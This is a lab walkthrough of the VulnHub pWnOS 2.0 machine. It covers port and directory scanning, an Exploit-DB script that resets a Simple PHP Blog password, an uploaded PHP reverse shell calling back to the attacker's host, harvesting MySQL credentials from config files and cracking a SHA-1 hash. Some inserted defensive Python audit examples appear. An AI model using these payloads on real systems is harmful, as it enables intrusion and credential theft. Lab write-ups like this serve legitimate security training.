pWnOS 2.0 Target Machine Penetration
Target introduction
VulnHub target machine
Local setup
Because of how this VM is built, its network card cannot be discovered while it is in NAT mode; it turns out the NAT network address has to be changed. Reference method: https://blog.csdn.net/Bossfrank/article/details/131415257 ; author's homepage: https://blog.csdn.net/Bossfrank?type=blog . PS: that UCAS master's student is very, very good; learned a lot from him.
nmap information gathering
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 10.10.10.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:37 CST
Nmap scan report for localhost (10.10.10.1)
Host is up (0.00035s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (10.10.10.2)
Host is up (0.00010s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00019s latency).
MAC Address: 00:0C:29:8D:63:FF (VMware)
Nmap scan report for localhost (10.10.10.128)
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for bogon (10.10.10.254)
Host is up (0.000068s latency).
MAC Address: 00:50:56:EB:94:F3 (VMware)
Nmap scan report for localhost (10.10.10.129)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.92 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 CST
Nmap scan report for bogon (10.10.10.100)
Host is up (0.000045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:8D:63:FF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00037s latency).
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:8D:63:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.09% done; ETC: 20:42 (0:00:08 remaining)
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.56% done; ETC: 20:44 (0:00:11 remaining)
Nmap scan report for bogon (10.10.10.100)
Host is up (0.00034s latency).
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http servers resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8D:63:FF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 395.77 seconds
Web penetration
The homepage says: "Welcome to this site. If you have any questions, please email admin@isints.com". Brute-force the directories:
┌──(kali㉿kali)-[~]
└─$ sudo dirb http://10.10.10.100
[sudo] password for kali:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Sep 29 23:08:26 2024
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6001)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5750)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5034)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5392)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Sep 29 23:08:34 2024
DOWNLOADED: 9224 - FOUND: 30
Try SQL injection against login.php with ' or 1=1 -- or ' or 1=1 #. Amusingly, it dumped the source code instead.
Grep the 200 responses out of the brute-forced directory list. This looks like a content management system, so look for the CMS name: in view-source:http://10.10.10.100/blog/index.php we find Simple PHP Blog 0.4.0. Search the exploit database for it.
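As an added example (not part of the original write-up), here is a small Python parser for dirb's output that does the "grep for 200" step programmatically. From a defender's point of view it also pulls out the two findings that matter more than the status codes: directories that are listable (includes/ and blog/config/ above, which expose configuration and include files) and a reachable info.php, which is the usual name for a phpinfo() page that leaks server configuration. The sample input is a constructed excerpt of the scan above.

```python
import re
from typing import Dict, List, Optional

# Constructed excerpt of the dirb scan shown on this page, used as offline sample input.
DIRB_SAMPLE = """\
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5750)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)
"""

# dirb line shapes: "+ <url> (CODE:nnn|SIZE:nnn)", "==> DIRECTORY: <url>",
# "---- Entering directory: <url> ----" and the listable-directory warning.
HIT_RE = re.compile(r"^\+\s+(\S+)\s+\(CODE:(\d{3})\|SIZE:(\d+)\)$")
DIR_RE = re.compile(r"^==>\s+DIRECTORY:\s+(\S+)$")
ENTER_RE = re.compile(r"^---- Entering directory:\s+(\S+)\s+----$")
LISTABLE_RE = re.compile(r"^\(!\) WARNING: Directory IS LISTABLE")


def parse_dirb(output: str) -> Dict[str, list]:
    """Split dirb output into hits (url/code/size), discovered directories and listable ones."""
    hits: List[Dict[str, object]] = []
    dirs: List[str] = []
    listable: List[str] = []
    current: Optional[str] = None  # directory dirb is currently scanning
    for raw in output.splitlines():
        line = raw.strip()
        if (m := HIT_RE.match(line)):
            hits.append({"url": m.group(1), "code": int(m.group(2)), "size": int(m.group(3))})
        elif (m := DIR_RE.match(line)):
            dirs.append(m.group(1))
        elif (m := ENTER_RE.match(line)):
            current = m.group(1)
        elif LISTABLE_RE.match(line) and current:
            # The warning refers to the directory dirb just entered.
            listable.append(current)
    return {"hits": hits, "dirs": dirs, "listable": listable}


def urls_with_code(parsed: Dict[str, list], code: int = 200) -> List[str]:
    """The 'grep for 200' step from the write-up, for any status code."""
    return [h["url"] for h in parsed["hits"] if h["code"] == code]


def exposure_findings(parsed: Dict[str, list]) -> List[str]:
    """Defender-side summary: listable directories and reachable phpinfo-style pages."""
    findings = [f"listable directory: {d}" for d in parsed["listable"]]
    for h in parsed["hits"]:
        if h["code"] == 200 and h["url"].rstrip("/").endswith("info.php"):
            findings.append(f"phpinfo-style page reachable: {h['url']}")
    return findings


if __name__ == "__main__":
    parsed = parse_dirb(DIRB_SAMPLE)
    print("200s:", urls_with_code(parsed))
    for finding in exposure_findings(parsed):
        print("finding:", finding)
```

The fix for both findings on an Apache 2.2 host of this vintage is `Options -Indexes` (globally or per directory) and removing or access-restricting the phpinfo page; the parser just makes the scan result easy to feed into a ticket.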
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo searchsploit simple php blog 0.4.0
[sudo] password for kali:
--------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                         |  Path
--------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - colors.php Multiple Cross-Site Scripting Vulnerabilities         | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - preview_cgi.php Multiple Cross-Site Scripting Vulnerabilities    | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - preview_static_cgi.php Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote Exploits                                       | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                          | php/webapps/16883.rb
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ searchsploit simple php blog -m 1191
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote Exploits
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
    Codes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos2.0/1191.pl

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ ls
1191.pl dir.ori
sudo apt-get install libswitch-perl
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Program : 1191.pl
Version : v0.1
Date    : 8/25/2005
Descript: This perl script demonstrates a few flaws in SimplePHPBlog.
Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
          DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO NOT HAVE PERMISSION TO DO SO!
          Please see this script comments for solution/fixes to demonstrated vulnerabilities.
          http://www.simplephpblog.com
Usage   : 1191.pl [-h host] [-e exploit]
  -? : this menu
  -h : host
  -e : exploit
       (1) : Upload cmd.php in [site]/images/
       (2) : Retreive Password file (hash)
       (3) : Set New User Name and Password
             [NOTE - uppercase switches for exploits]
             -U : user name
             -P : password
       (4) : Delete a System File
             -F : Path and System File
Examples:
  1191.pl -h 127.0.0.1 -e 2
  1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
  1191.pl -h 127.0.0.1 -e 4 -F ./index.php
  1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
  1191.pl -h 127.0.0.1 -e 1
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hugomc -P hugomc
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: hugomc
Password is set to: hugomc
*** Exploit Completed....
Have a nice day! :)
Upload a shell to get a low-privilege shell
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ cat shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.129/1234 0>&1'"); ?>
Upload this shell.
Combined with the directory brute-force results, the shell should end up at http://10.10.10.100/blog/images/shell.php; start a listener and request that URL to get a shell.
Got the initial shell:
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo ncat -lvnp 1234
[sudo] password for kali:
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.100:34941.
bash: no job control in this shell
www-data@web:/var/www/blog/images$
Attempt privilege escalation
www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link
       valid_lft forever preferred_lft forever
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/images$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/images$ python --version
python --version
Python 2.7.1
www-data@web:/var/www/blog/images$
Use python to upgrade to an interactive shell
www-data@web:/var/www/blog/images$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Look for leaked sensitive files
www-data@web:/var/www/blog/images$ pwd
pwd
/var/www/blog/images
www-data@web:/var/www/blog/images$ cd ..
cd ..
www-data@web:/var/www/blog$ ls
ls
add.php flash rate_cgi.php
add_block.php image_list.php rdf.php
add_cgi.php images recompress.php
add_link.php index.php rss.php
add_static.php info.php scripts
add_static_cgi.php install00.php search.php
atom.php install01.php set_login.php
categories.php install02.php set_login_cgi.php
colors.php install03.php setup.php
colors_cgi.php install03_cgi.php setup_cgi.php
comment_add_cgi.php interface static.php
comment_delete_cgi.php languages stats.php
comments.php languages.php themes
config languages_cgi.php themes.php
contact.php login.php trackback.php
contact_cgi.php login_cgi.php trackback_delete_cgi.php
content logout.php upgrade.php
delete.php options.php upload_img.php
delete_static.php options_cgi.php upload_img_cgi.php
docs preview_cgi.php upload_img_new.php
downgrade.php preview_static_cgi.php
www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php includes info.php mysqli_connect.php
blog index.php login.php register.php
Looks like we found something
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:
$dbc = mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
www-data@web:/var/www$
Cannot log in with it. Are there other configuration files?
www-data@web:/var/www$ mysql -uroot -pgoodday
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Indeed: the database connection configuration file in another location has different contents.
www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'rootISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:
$dbc = mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
www-data@web:/var/www$
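Two copies of mysqli_connect.php, one of them inside the document root and readable by the web user, is the kind of thing a configuration audit should catch before an attacker does. As an added example (not from the page or from Simple PHP Blog), here is a Python audit that walks a directory tree for PHP files defining DB_* constants with literal passwords and flags the ones that sit under the web root. The sample tree is a constructed recreation of the two files above, written to a temp directory with the page's values; the `build_sample_tree` helper and the `DB_*` constant names it searches for are assumptions about the layout, not part of the CMS.

```python
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List, Tuple

# Matches constant definitions of the form:  DEFINE ('DB_PASSWORD', 'secret');
# (case-insensitive, single or double quotes, optional whitespace before the paren).
CRED_RE = re.compile(
    r"""\bdefine\s*\(\s*['"](DB_(?:USER|PASSWORD|HOST|NAME))['"]\s*,\s*['"]([^'"]*)['"]\s*\)""",
    re.IGNORECASE,
)


@dataclass
class Finding:
    path: str
    user: str
    password: str
    in_web_root: bool  # True when the file lives under the document root


def _is_under(path: str, root: str) -> bool:
    path, root = os.path.abspath(path), os.path.abspath(root)
    return os.path.commonpath([path, root]) == root


def scan_php_for_db_credentials(root: str, web_root: str) -> List[Finding]:
    """Return every .php file under `root` that hardcodes a DB_PASSWORD constant."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                consts = {k.upper(): v for k, v in CRED_RE.findall(fh.read())}
            if "DB_PASSWORD" in consts:
                findings.append(
                    Finding(path, consts.get("DB_USER", ""), consts["DB_PASSWORD"], _is_under(path, web_root))
                )
    return sorted(findings, key=lambda f: f.path)


# Constructed recreation of the connection file found on the box (assumption: same layout).
CONNECT_TEMPLATE = """<?php # Script 8.2 - mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', '{password}');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
$dbc = mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
"""


def build_sample_tree() -> Tuple[str, str]:
    """Write /var/mysqli_connect.php and /var/www/mysqli_connect.php under a temp dir.

    Returns (root, web_root) so the scan can be run offline.
    """
    root = tempfile.mkdtemp(prefix="pwnos-audit-")
    web_root = os.path.join(root, "var", "www")
    os.makedirs(os.path.join(web_root, "blog"))
    files = {
        os.path.join(root, "var", "mysqli_connect.php"): CONNECT_TEMPLATE.format(password="rootISIntS"),
        os.path.join(web_root, "mysqli_connect.php"): CONNECT_TEMPLATE.format(password="goodday"),
        os.path.join(web_root, "blog", "index.php"): "<?php echo 'no credentials here'; ?>\n",
    }
    for path, content in files.items():
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root, web_root


if __name__ == "__main__":
    root, web_root = build_sample_tree()
    for f in scan_php_for_db_credentials(root, web_root):
        where = "INSIDE web root" if f.in_web_root else "outside web root"
        print(f"{f.path}: user={f.user} password=<redacted> ({where})")
```

What a defender does with the output: keep a single credentials file outside the document root, readable only by the PHP worker's user, and give the application its own MySQL account with rights limited to its schema rather than `root`, so a leaked config file cannot be turned into a database-wide (or, as on this box, system-wide) compromise.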
Successfully logged into MySQL
www-data@web:/var/www$ mysql -uroot -prootISIntS
mysql -uroot -prootISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
Look at the database contents
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16
use ch16
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)
Look at the users table
mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)
The password hashing scheme is identified as SHA-1
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ hash-identifier c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
--------------------------------------------------
 Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
With the password hash in hand, try to crack the SHA-1. The password is:
c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying
Check /etc/passwd to confirm the username.
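The users table stores an unsalted SHA-1 digest, which is why a wordlist lookup recovers the password: every user with the same password gets the same hash, and a precomputed table serves every such application at once. As an added example (not the page's code and not the CMS's), the Python below verifies such legacy digests, hashes new passwords with salted PBKDF2-HMAC-SHA256 instead, and migrates a legacy record transparently the next time its owner logs in, which is the usual way to retire a weak scheme without forcing a password reset. The iteration count and the `pbkdf2_sha256$iterations$salt$hash` storage format are my assumptions, not something the application on this box uses; `PAGE_HASH`/`PAGE_PASSWORD` are the pair reported above.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# The hash/password pair reported on this page for the ch16.users row.
PAGE_HASH = "c2c4b4e51d9e23c02c15702c136c3e950ba9a4af"
PAGE_PASSWORD = "killerbeesareflying"

# Assumption: OWASP's 2023 guidance for PBKDF2-HMAC-SHA256 is 600,000 iterations.
PBKDF2_ITERATIONS = 600_000


def legacy_sha1_hash(password: str) -> str:
    """Unsalted SHA-1, the scheme the users table above uses. Same input -> same digest."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def legacy_sha1_verify(password: str, stored_hex: str) -> bool:
    return hmac.compare_digest(legacy_sha1_hash(password), stored_hex.lower())


def page_hash_matches() -> bool:
    """Re-check the page's cracked pair offline."""
    return legacy_sha1_verify(PAGE_PASSWORD, PAGE_HASH)


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash. Two calls with the same password give different strings."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Verify against the pbkdf2_sha256$iterations$salt$hash format written by hash_password."""
    try:
        scheme, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def verify_and_migrate(password: str, stored: str) -> Tuple[bool, Optional[str]]:
    """Login-time check that upgrades legacy SHA-1 rows.

    Returns (ok, new_stored). new_stored is a replacement value to write back when a
    legacy row verified successfully, otherwise None.
    """
    if stored.startswith("pbkdf2_sha256$"):
        return verify_password(password, stored), None
    if len(stored) == 40 and legacy_sha1_verify(password, stored):
        return True, hash_password(password)  # plaintext is available only at login time
    return False, None


if __name__ == "__main__":
    print("page pair verifies:", page_hash_matches())
    ok, upgraded = verify_and_migrate(PAGE_PASSWORD, PAGE_HASH)
    print("migrated:", ok, upgraded is not None)
```

The migration path matters for the box above: after the switch, a dump of the users table yields per-user salted PBKDF2 strings, so the single-lookup crack shown in the write-up no longer applies, and the root password reuse would still have to be guessed online through SSH where rate limiting and logging apply.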
www-data@web:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
Password spraying
